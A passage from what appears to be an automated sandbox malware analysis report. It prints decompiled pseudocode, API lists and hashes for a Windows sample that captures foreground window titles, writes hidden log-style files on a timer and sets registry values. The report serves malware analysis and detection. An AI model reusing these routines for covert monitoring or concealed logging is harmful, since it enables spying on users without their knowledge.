                                                                                                                                      				_t92 = _t33;
                                                                                                                                      				_t97 = GetWindowTextLengthW(_t92);
                                                                                                                                      				_t110 = _t97;
                                                                                                                                      				if(_t97 == 0) {
                                                                                                                                      					L6:
                                                                                                                                      					 *((char*)(_t101 - 0x14)) = 0;
                                                                                                                                      					L7:
                                                                                                                                      					E01302755(_t101 + 8, _t90, _t114);
                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t101 - 0xc));
                                                                                                                                      					return  *((intOrPtr*)(_t101 - 0x14));
                                                                                                                                      				}
                                                                                                                                      				_t99 = _t97 + 1;
                                                                                                                                      				E013027BD(_t101 - 0x44, _t99, 0);
                                                                                                                                      				 *((intOrPtr*)(_t101 - 0x14)) = 1;
                                                                                                                                      				 *(_t101 - 4) = 1;
                                                                                                                                      				GetWindowTextW(_t92, E01302712(_t101 - 0x44, _t110), _t99);
                                                                                                                                      				E01302723(_t101 - 0x44, CharLowerW(E01302712(_t101 - 0x44, _t110)));
                                                                                                                                      				_t106 = _t104 - 0x18;
                                                                                                                                      				 *((intOrPtr*)(_t101 - 0x1c)) = _t104 - 0x18;
                                                                                                                                      				E013027E1(_t106, _t90, ";");
                                                                                                                                      				 *(_t101 - 4) = 2;
                                                                                                                                      				E01302814(_t106 - 0x18, _t90, _t110, _t101 + 8);
                                                                                                                                      				 *(_t101 - 4) = 1;
                                                                                                                                      				E013073C8(_t101 - 0x2c, _t90, _t110); // executed
                                                                                                                                      				 *(_t101 - 4) = 3;
                                                                                                                                      				_t94 = 0;
                                                                                                                                      				if(E01304C55(_t101 - 0x2c) == 0) {
                                                                                                                                      					L5:
                                                                                                                                      					E01307F51(_t101 - 0x2c, _t90);
                                                                                                                                      					E01302755(_t101 - 0x44, _t90, _t114);
                                                                                                                                      					goto L6;
                                                                                                                                      				}
                                                                                                                                      				_t100 = 0;
                                                                                                                                      				while(E01308054(_t101 - 0x44, 0, E01307EC7(_t63, _t101 - 0x2c, _t90, _t101, 0, _t100), 0) == 0xffffffff) {
                                                                                                                                      					_t94 = _t94 + 1;
                                                                                                                                      					_t100 = _t94 & 0x0000ffff;
                                                                                                                                      					_t61 = E01304C55(_t101 - 0x2c);
                                                                                                                                      					_t114 = _t100 - _t61;
                                                                                                                                      					if(_t100 < _t61) {
                                                                                                                                      						continue;
                                                                                                                                      					}
                                                                                                                                      					goto L5;
                                                                                                                                      				}
                                                                                                                                      				__eflags = _t63;
                                                                                                                                      				if(__eflags != 0) {
                                                                                                                                      					E01312085(_t63, E01302712(_t101 - 0x44, __eflags));
                                                                                                                                      				}
                                                                                                                                      				_t95 =  *((intOrPtr*)(_t101 - 0x18));
                                                                                                                                      				__eflags =  *((intOrPtr*)(_t101 - 0x18));
                                                                                                                                      				if(__eflags != 0) {
                                                                                                                                      					E01312085(_t95, E01302712(E01307EC7(_t63, _t101 - 0x2c, _t90, _t101, __eflags, _t100), __eflags));
                                                                                                                                      				}
                                                                                                                                      				E01307F51(_t101 - 0x2c, _t90);
                                                                                                                                      				E01302755(_t101 - 0x44, _t90, __eflags);
                                                                                                                                      				goto L7;
                                                                                                                                      			}

















                                                                                                                                      0x01307932
                                                                                                                                      0x01307932
                                                                                                                                      0x01307937
                                                                                                                                      0x0130793c
                                                                                                                                      0x01307942
                                                                                                                                      0x01307945
                                                                                                                                      0x01307947
                                                                                                                                      0x0130794b
                                                                                                                                      0x01307951
                                                                                                                                      0x0130795a
                                                                                                                                      0x0130795c
                                                                                                                                      0x0130795e
                                                                                                                                      0x01307a22
                                                                                                                                      0x01307a22
                                                                                                                                      0x01307a26
                                                                                                                                      0x01307a29
                                                                                                                                      0x01307a36
                                                                                                                                      0x01307a3f
                                                                                                                                      0x01307a3f
                                                                                                                                      0x01307966
                                                                                                                                      0x0130796b
                                                                                                                                      0x01307977
                                                                                                                                      0x0130797a
                                                                                                                                      0x01307984
                                                                                                                                      0x0130799d
                                                                                                                                      0x013079a2
                                                                                                                                      0x013079a7
                                                                                                                                      0x013079af
                                                                                                                                      0x013079b7
                                                                                                                                      0x013079c1
                                                                                                                                      0x013079c9
                                                                                                                                      0x013079cd
                                                                                                                                      0x013079d8
                                                                                                                                      0x013079dc
                                                                                                                                      0x013079e5
                                                                                                                                      0x01307a12
                                                                                                                                      0x01307a15
                                                                                                                                      0x01307a1d
                                                                                                                                      0x00000000
                                                                                                                                      0x01307a1d
                                                                                                                                      0x013079e7
                                                                                                                                      0x013079e9
                                                                                                                                      0x01307a02
                                                                                                                                      0x01307a06
                                                                                                                                      0x01307a09
                                                                                                                                      0x01307a0e
                                                                                                                                      0x01307a10
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01307a10
                                                                                                                                      0x01307a40
                                                                                                                                      0x01307a42
                                                                                                                                      0x01307a4e
                                                                                                                                      0x01307a54
                                                                                                                                      0x01307a55
                                                                                                                                      0x01307a58
                                                                                                                                      0x01307a5a
                                                                                                                                      0x01307a6e
                                                                                                                                      0x01307a74
                                                                                                                                      0x01307a78
                                                                                                                                      0x01307a80
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01307937
                                                                                                                                      • GetForegroundWindow.USER32(74CB6490,?,00000000), ref: 0130794B
                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 01307954
                                                                                                                                      • GetWindowTextW.USER32 ref: 01307984
                                                                                                                                      • CharLowerW.USER32(00000000), ref: 01307993
                                                                                                                                        • Part of subcall function 013073C8: __EH_prolog.LIBCMT ref: 013073CD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$H_prologText$CharForegroundLengthLower
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1319267497-0
                                                                                                                                      • Opcode ID: 638d77b2f7258a74ec4ac5d1c4a4e1eb2c4bffa0bcd0296b4fc6c312ec5a283a
                                                                                                                                      • Instruction ID: 59a6704a17a2a104548c1ab2ed87eae1753bb5bf9cf4b08c074fab3c7d3c5018
                                                                                                                                      • Opcode Fuzzy Hash: 638d77b2f7258a74ec4ac5d1c4a4e1eb2c4bffa0bcd0296b4fc6c312ec5a283a
                                                                                                                                      • Instruction Fuzzy Hash: CF418231D00116AADB16FBBCD965AFEBBF8DF64618F104019D852A31C1EF346B09C7A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013018ED(void* __ecx, void* __edx) {
                                                                                                                                      				void* _t11;
                                                                                                                                      				signed char _t13;
                                                                                                                                      				void* _t18;
                                                                                                                                      				void* _t26;
                                                                                                                                      				void* _t44;
                                                                                                                                      
                                                                                                                                      				_t41 = __edx;
                                                                                                                                      				_t44 = __ecx;
                                                                                                                                      				_t26 = __ecx + 4;
                                                                                                                                      				do {
                                                                                                                                      					Sleep(0x1388); // executed
                                                                                                                                      					E0130183D(_t41);
                                                                                                                                      					if(E01303300() != 0) {
                                                                                                                                      						_t11 = E013026DC();
                                                                                                                                      						_t46 = _t11;
                                                                                                                                      						if(_t11 == 0) {
                                                                                                                                      							CreateDirectoryW(E01302712(0x132f9e0, _t46), 0); // executed
                                                                                                                                      						}
                                                                                                                                      						_t43 = _t44 + 0x68;
                                                                                                                                      						_t13 = GetFileAttributesW(E01302712(_t44 + 0x68, _t46)); // executed
                                                                                                                                      						_t47 = _t13 & 0x00000002;
                                                                                                                                      						if((_t13 & 0x00000002) != 0) {
                                                                                                                                      							SetFileAttributesW(E01302712(_t43, _t47), 0x80); // executed
                                                                                                                                      						}
                                                                                                                                      						_t48 =  *((intOrPtr*)(_t44 + 0xd0));
                                                                                                                                      						if( *((intOrPtr*)(_t44 + 0xd0)) != 0) {
                                                                                                                                      							E013019C4(_t44, _t41, __eflags); // executed
                                                                                                                                      						} else {
                                                                                                                                      							_t18 = E01302712(_t43, _t48);
                                                                                                                                      							_t41 = E01302709() + _t19;
                                                                                                                                      							E01302712(_t26, _t48);
                                                                                                                                      							E013074EF(E01302709() + _t19, _t18, 1);
                                                                                                                                      						}
                                                                                                                                      						E01302723(_t26, 0x1329c7c);
                                                                                                                                      						_t49 =  *((intOrPtr*)(_t44 + 0xd4)) - 1;
                                                                                                                                      						if( *((intOrPtr*)(_t44 + 0xd4)) == 1) {
                                                                                                                                      							SetFileAttributesW(E01302712(_t43, _t49), 6); // executed
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				} while ( *((char*)(_t44 + 0x50)) != 0);
                                                                                                                                      				return 0;
                                                                                                                                      			}








                                                                                                                                      0x013018ed
                                                                                                                                      0x013018ef
                                                                                                                                      0x013018f2
                                                                                                                                      0x013018f5
                                                                                                                                      0x013018fa
                                                                                                                                      0x01301902
                                                                                                                                      0x01301910
                                                                                                                                      0x0130191b
                                                                                                                                      0x01301920
                                                                                                                                      0x01301922
                                                                                                                                      0x0130192c
                                                                                                                                      0x0130192c
                                                                                                                                      0x01301932
                                                                                                                                      0x0130193d
                                                                                                                                      0x01301943
                                                                                                                                      0x01301945
                                                                                                                                      0x01301954
                                                                                                                                      0x01301954
                                                                                                                                      0x0130195a
                                                                                                                                      0x01301961
                                                                                                                                      0x0130198a
                                                                                                                                      0x01301963
                                                                                                                                      0x01301967
                                                                                                                                      0x01301976
                                                                                                                                      0x01301978
                                                                                                                                      0x0130197f
                                                                                                                                      0x01301985
                                                                                                                                      0x01301996
                                                                                                                                      0x0130199b
                                                                                                                                      0x013019a2
                                                                                                                                      0x013019ae
                                                                                                                                      0x013019ae
                                                                                                                                      0x013019a2
                                                                                                                                      0x013019b4
                                                                                                                                      0x013019c3

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00001388,?,?,?,013014C5), ref: 013018FA
                                                                                                                                        • Part of subcall function 0130183D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 01301874
                                                                                                                                        • Part of subcall function 0130183D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 01301883
                                                                                                                                        • Part of subcall function 0130183D: Sleep.KERNEL32(00002710), ref: 013018B0
                                                                                                                                        • Part of subcall function 0130183D: CloseHandle.KERNEL32(00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 013018B7
                                                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000,?,?,?,013014C5), ref: 0130192C
                                                                                                                                        • Part of subcall function 013019C4: __EH_prolog.LIBCMT ref: 013019C9
                                                                                                                                        • Part of subcall function 013019C4: PathFileExistsW.KERNELBASE(00000000,00000000,00000000,?,?), ref: 01301A0C
                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,?,?,?,013014C5), ref: 0130193D
                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000080,?,?,?,013014C5), ref: 01301954
                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000006,01329C7C), ref: 013019AE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Attributes$CreateSleep$CloseDirectoryExistsH_prologHandlePathSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 822854593-0
                                                                                                                                      • Opcode ID: 2b963973e382635dc0a1dac2ec3aebf031795c406680ef464f72a4e8e6843554
                                                                                                                                      • Instruction ID: b8d7ecfaf2e35134632441b1119a47f89d9465b5aabb299b5543560af5c049fc
                                                                                                                                      • Opcode Fuzzy Hash: 2b963973e382635dc0a1dac2ec3aebf031795c406680ef464f72a4e8e6843554
                                                                                                                                      • Instruction Fuzzy Hash: 29116A307003125BDA273BBC59B87BE27DA9FA0B1DF00441DE942A72C3DF68984593A0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 821 13060ed-1306115 RegOpenKeyExW 822 1306147-130614a 821->822 823 1306117-1306141 RegQueryValueExW RegCloseKey 821->823 823->822 824 1306143-1306146 823->824
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013060ED(short* __edx, char* _a8) {
                                                                                                                                      				void* _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				int _v16;
                                                                                                                                      				int _t9;
                                                                                                                                      				long _t11;
                                                                                                                                      				long _t15;
                                                                                                                                      
                                                                                                                                      				_t9 = 4;
                                                                                                                                      				_v12 = _t9;
                                                                                                                                      				_v16 = _t9;
                                                                                                                                      				_t11 = RegOpenKeyExW(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                                                                                                                                      				if(_t11 != 0) {
                                                                                                                                      					L3:
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t15 = RegQueryValueExW(_v8, L"override", 0,  &_v16, _a8,  &_v12); // executed
                                                                                                                                      					RegCloseKey(_v8); // executed
                                                                                                                                      					if(_t15 != 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						return 1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}









                                                                                                                                      0x013060f5
                                                                                                                                      0x013060f6
                                                                                                                                      0x013060f9
                                                                                                                                      0x0130610d
                                                                                                                                      0x01306115
                                                                                                                                      0x01306147
                                                                                                                                      0x0130614a
                                                                                                                                      0x01306117
                                                                                                                                      0x0130612d
                                                                                                                                      0x01306138
                                                                                                                                      0x01306141
                                                                                                                                      0x00000000
                                                                                                                                      0x01306143
                                                                                                                                      0x01306146
                                                                                                                                      0x01306146
                                                                                                                                      0x01306141

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000), ref: 0130610D
                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,override,00000000,0132F948,0132F948,?,0132F948), ref: 0130612D
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 01306138
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                      • String ID: override
                                                                                                                                      • API String ID: 3677997916-2181236453
                                                                                                                                      • Opcode ID: e398ad66da74ab848f42cda360b517c3f3c328ec780c288d85f27488b0c464a2
                                                                                                                                      • Instruction ID: 73d7d550fa12f229f23122b707f2405bf34e5252dc60a1a8aab747fb76870fc6
                                                                                                                                      • Opcode Fuzzy Hash: e398ad66da74ab848f42cda360b517c3f3c328ec780c288d85f27488b0c464a2
                                                                                                                                      • Instruction Fuzzy Hash: 98F030B5E00218BFDF21AFA49C06FEEBBBCEB04B48F104055FA05F6185D2709A54AB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 825 130618e-13061a4 RegCreateKeyA 826 13061d2-13061d5 825->826 827 13061a6-13061cc RegSetValueExA RegCloseKey 825->827 827->826 828 13061ce-13061d1 827->828
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0130618E(void* __ecx, char* __edx, char* _a8, int _a12) {
                                                                                                                                      				void* _v8;
                                                                                                                                      				int _t7;
                                                                                                                                      				long _t9;
                                                                                                                                      
                                                                                                                                      				_t7 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                                                                                                                                      				if(_t7 != 0) {
                                                                                                                                      					L3:
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t9 = RegSetValueExA(_v8, "license", _t7, 1, _a8, _a12); // executed
                                                                                                                                      					RegCloseKey(_v8); // executed
                                                                                                                                      					if(_t9 != 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						return 1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}






                                                                                                                                      0x0130619c
                                                                                                                                      0x013061a4
                                                                                                                                      0x013061d2
                                                                                                                                      0x013061d5
                                                                                                                                      0x013061a6
                                                                                                                                      0x013061b8
                                                                                                                                      0x013061c3
                                                                                                                                      0x013061cc
                                                                                                                                      0x00000000
                                                                                                                                      0x013061ce
                                                                                                                                      0x013061d1
                                                                                                                                      0x013061d1
                                                                                                                                      0x013061cc

                                                                                                                                      APIs
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,?,00000001), ref: 0130619C
                                                                                                                                      • RegSetValueExA.KERNELBASE(00000001,license,00000000,00000001,?,01305AAA,?,?,00000001,?,?,013061EF,?,00000000,00000001), ref: 013061B8
                                                                                                                                      • RegCloseKey.KERNELBASE(00000001,?,?,00000001,?,?,013061EF,?,00000000,00000001,?,00000000,01305AAA,?,00000000,00000001), ref: 013061C3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                      • String ID: license
                                                                                                                                      • API String ID: 1818849710-1466496025
                                                                                                                                      • Opcode ID: d380b45a8fb38ee84bec3fd76f9abecd763f18ca92836b2f68962a45240cba16
                                                                                                                                      • Instruction ID: d36f333acd2319e2886a88e7b437f174740671cd2bb2361504d517e08083db44
                                                                                                                                      • Opcode Fuzzy Hash: d380b45a8fb38ee84bec3fd76f9abecd763f18ca92836b2f68962a45240cba16
                                                                                                                                      • Instruction Fuzzy Hash: 3BE09272600218BFDF326F909C05EEA7BADEB00B98F004058FE15E2142C2718E60AB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013074EF(long __edx, WCHAR* _a4, long _a8) {
                                                                                                                                      				long _v4;
                                                                                                                                      				long _t8;
                                                                                                                                      				long _t9;
                                                                                                                                      				void* _t10;
                                                                                                                                      				int _t12;
                                                                                                                                      				struct _OVERLAPPED* _t18;
                                                                                                                                      				void* _t19;
                                                                                                                                      				long _t20;
                                                                                                                                      				long _t22;
                                                                                                                                      				void* _t23;
                                                                                                                                      				void* _t24;
                                                                                                                                      
                                                                                                                                      				_t18 = 0;
                                                                                                                                      				_t24 = _t19;
                                                                                                                                      				_t22 = __edx;
                                                                                                                                      				_t8 = _a8;
                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                      					_t9 = 0x40000000;
                                                                                                                                      					_t20 = 2;
                                                                                                                                      				} else {
                                                                                                                                      					if(_t8 != 1) {
                                                                                                                                      						_t9 = _a8;
                                                                                                                                      						_t20 = _a8;
                                                                                                                                      					} else {
                                                                                                                                      						_t9 = 4;
                                                                                                                                      						_t20 = _t9;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t10 = CreateFileW(_a4, _t9, _t18, _t18, _t20, 0x80, _t18); // executed
                                                                                                                                      				_t23 = _t10;
                                                                                                                                      				if(_t23 != 0xffffffff) {
                                                                                                                                      					if(_a8 != 1 || SetFilePointer(_t23, _t18, _t18, 2) != 0xffffffff) {
                                                                                                                                      						_t12 = WriteFile(_t23, _t24, _t22,  &_v4, _t18); // executed
                                                                                                                                      						if(_t12 != 0) {
                                                                                                                                      							_t18 = 1;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					FindCloseChangeNotification(_t23); // executed
                                                                                                                                      					return _t18;
                                                                                                                                      				} else {
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}














                                                                                                                                      0x013074f7
                                                                                                                                      0x013074f9
                                                                                                                                      0x013074fc
                                                                                                                                      0x013074fe
                                                                                                                                      0x01307500
                                                                                                                                      0x0130751a
                                                                                                                                      0x0130751f
                                                                                                                                      0x01307502
                                                                                                                                      0x01307505
                                                                                                                                      0x0130750e
                                                                                                                                      0x01307512
                                                                                                                                      0x01307507
                                                                                                                                      0x01307509
                                                                                                                                      0x0130750a
                                                                                                                                      0x0130750a
                                                                                                                                      0x01307505
                                                                                                                                      0x0130752e
                                                                                                                                      0x01307534
                                                                                                                                      0x01307539
                                                                                                                                      0x01307544
                                                                                                                                      0x0130755f
                                                                                                                                      0x01307567
                                                                                                                                      0x01307569
                                                                                                                                      0x01307569
                                                                                                                                      0x01307567
                                                                                                                                      0x0130756c
                                                                                                                                      0x00000000
                                                                                                                                      0x0130753b
                                                                                                                                      0x00000000
                                                                                                                                      0x0130753b

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,01307CD3,00000000,00000000,?), ref: 0130752E
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,?,?), ref: 0130754B
                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,00000000,?,?), ref: 0130755F
                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,00000000,?,?), ref: 0130756C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 175865374-0
                                                                                                                                      • Opcode ID: 4420cf0492a19edadd3bdaffbe76a5f18f36bfb0f970a6ccf7597fc7101a9b92
                                                                                                                                      • Instruction ID: 8d46a6abbcd9bfd2e9c600dc172fdef5f2e86f2d41942c4b9442515702cc4777
                                                                                                                                      • Opcode Fuzzy Hash: 4420cf0492a19edadd3bdaffbe76a5f18f36bfb0f970a6ccf7597fc7101a9b92
                                                                                                                                      • Instruction Fuzzy Hash: 1301D2B1205154BFF6329D2CAC99EBBB7DCEB46369F200629F291C21C0D622AC058675
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                      			E0130127A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                      				void* _t43;
                                                                                                                                      				void* _t44;
                                                                                                                                      				char _t55;
                                                                                                                                      				void* _t60;
                                                                                                                                      				intOrPtr _t72;
                                                                                                                                      				void* _t82;
                                                                                                                                      				void* _t100;
                                                                                                                                      				void* _t102;
                                                                                                                                      				void* _t103;
                                                                                                                                      
                                                                                                                                      				E01323174(E013231AC, __edx, __eflags);
                                                                                                                                      				_t103 = _t102 - 0x50;
                                                                                                                                      				 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
                                                                                                                                      				 *0x132f9a9 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                      				 *0x132fa30 =  *((intOrPtr*)(_t100 + 0x24));
                                                                                                                                      				E01302882(0x132fa38, _t100 + 0x30);
                                                                                                                                      				 *0x132fa34 =  *((intOrPtr*)(_t100 + 0x28));
                                                                                                                                      				 *0x132f9ac =  *((intOrPtr*)(_t100 + 0x2c));
                                                                                                                                      				E01302801(_t100 - 0x28);
                                                                                                                                      				 *(_t100 - 4) = 1;
                                                                                                                                      				_t43 = E01310EA0( *((intOrPtr*)(_t100 + 0x10)));
                                                                                                                                      				_t94 =  *((intOrPtr*)(_t100 + 0xc));
                                                                                                                                      				_t72 = _t100 - 0x40;
                                                                                                                                      				_t108 = _t43;
                                                                                                                                      				if(_t43 != 0) {
                                                                                                                                      					_push( *((intOrPtr*)(_t100 + 0x10)));
                                                                                                                                      					_t44 = E01307692(_t72, _t94, __eflags); // executed
                                                                                                                                      					E0130275A(0x132f9e0, _t94, _t44);
                                                                                                                                      					E01302755(_t100 - 0x40, _t94, __eflags);
                                                                                                                                      					_push(0x1329c08);
                                                                                                                                      					_t94 = E013031D6(_t100 - 0x58, 0x132f9e0, __eflags);
                                                                                                                                      					 *(_t100 - 4) = 2;
                                                                                                                                      					E0130275A(_t100 - 0x28, _t47, E013031AE(_t100 - 0x40, _t47, __edi,  *((intOrPtr*)(_t100 + 0x14))));
                                                                                                                                      					E01302755(_t100 - 0x40, _t94, __eflags);
                                                                                                                                      					 *(_t100 - 4) = 1;
                                                                                                                                      					_t82 = _t100 - 0x58;
                                                                                                                                      				} else {
                                                                                                                                      					_push( *((intOrPtr*)(_t100 + 0x14)));
                                                                                                                                      					E0130275A(_t100 - 0x28, _t94, E01307692(_t72, _t94, _t108));
                                                                                                                                      					_t82 = _t100 - 0x40;
                                                                                                                                      				}
                                                                                                                                      				E01302755(_t82, _t94, _t108);
                                                                                                                                      				 *0x132fa14 =  *0x132fa14 & 0x00000000;
                                                                                                                                      				 *0x132fa10 =  *(_t100 + 0x18) * 0x3e8;
                                                                                                                                      				 *0x132f9b1 =  *((intOrPtr*)(_t100 + 0x1c));
                                                                                                                                      				_t55 =  *0x132f9a9;
                                                                                                                                      				if(_t55 == 0) {
                                                                                                                                      					E01302814(_t103 - 0x18, _t94, __eflags, _t100 - 0x28);
                                                                                                                                      					E013013D7(0x132f960, _t94, __eflags); // executed
                                                                                                                                      				} else {
                                                                                                                                      					_t110 = _t55 == 1;
                                                                                                                                      					if(_t55 == 1) {
                                                                                                                                      						E01302723(0x132fa18,  *((intOrPtr*)(_t100 + 0x20)));
                                                                                                                                      						E01302814(_t103 - 0x18, _t94, _t110, _t100 - 0x28);
                                                                                                                                      						E01301459(0x132f960, _t94, _t110);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E01302755(_t100 - 0x28, _t94, _t110);
                                                                                                                                      				_t60 = E013028AF(_t100 + 0x30, _t94, _t110);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t100 - 0xc));
                                                                                                                                      				return _t60;
                                                                                                                                      			}












                                                                                                                                      0x0130127f
                                                                                                                                      0x01301284
                                                                                                                                      0x01301288
                                                                                                                                      0x01301294
                                                                                                                                      0x0130129c
                                                                                                                                      0x013012a5
                                                                                                                                      0x013012b0
                                                                                                                                      0x013012b8
                                                                                                                                      0x013012bd
                                                                                                                                      0x013012c5
                                                                                                                                      0x013012c9
                                                                                                                                      0x013012ce
